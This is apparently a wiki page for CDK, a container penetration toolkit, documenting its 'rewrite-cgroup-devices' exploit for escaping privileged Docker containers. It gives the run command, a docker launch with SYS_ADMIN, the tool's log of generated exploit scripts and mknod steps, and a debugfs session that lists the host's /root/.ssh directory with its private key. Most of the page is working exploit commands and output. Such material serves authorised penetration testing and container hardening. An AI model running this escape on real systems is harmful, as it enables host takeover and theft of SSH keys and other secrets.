-
Notifications
You must be signed in to change notification settings - Fork 591
Exploit: rewrite cgroup devices
neargle edited this page Jan 25, 2021
·
3 revisions
Rewrite the /sys/fs/cgroup/devices/devices.allow in the current container to access files in the host to escape privileged containers.
重写当前容器内的 /sys/fs/cgroup/devices/devices.allow,逃逸特权容器访问宿主机内的文件。
./cdk run rewrite-cgroup-devices
➜ /tmp docker run -it -v /tmp:/tmp --cap-add="SYS_ADMIN" near/neo4j-test bash
# ./cdk run rewrite-cgroup-devices
2021/01/23 07:28:10 generate shell exploit: /tmp/rewrite-cgroup-devices-exp-dylqyn.sh
Execute Shell:/tmp/rewrite-cgroup-devices-exp-dylqyn.sh finished with output:
2021/01/23 07:28:10 get /sys/fs/cgroup/devices/devices.allow inode id: 955171887
2021/01/23 07:28:10 find cgroup devices.allow file: /sys/fs/cgroup/cgneartest/docker/c254a346291562776f08fd135c267e64eef0f6908578a9eebd97274d543a865f/devices.allow
2021/01/23 07:28:10 get virtblk device ID: 252
2021/01/23 07:28:10 generate shell exploit: /tmp/device-mknod-cmezii.sh
Execute Shell:/tmp/device-mknod-cmezii.sh finished with output:
2021/01/23 07:28:12 now, run 'debugfs cdk_mknod_result' to browse host files.
# debugfs cdk_mknod_result
debugfs 1.42.13 (17-May-2015)
debugfs: ls -l /root/.ssh
393231 40700 (2) 0 0 4096 22-Nov-2020 15:59 .
52566 40550 (2) 0 0 4096 23-Jan-2021 07:27 ..
395870 100600 (1) 0 0 746 29-May-2020 06:11 authorized_keys
395829 100644 (1) 0 0 247 7-Aug-2020 07:01 config
395860 100644 (1) 0 0 725 16-Dec-2020 10:53 known_hosts
393227 100600 (1) 0 0 1675 22-Nov-2020 15:59 id_rsa
395831 100644 (1) 0 0 391 22-Nov-2020 15:59 id_rsa.pub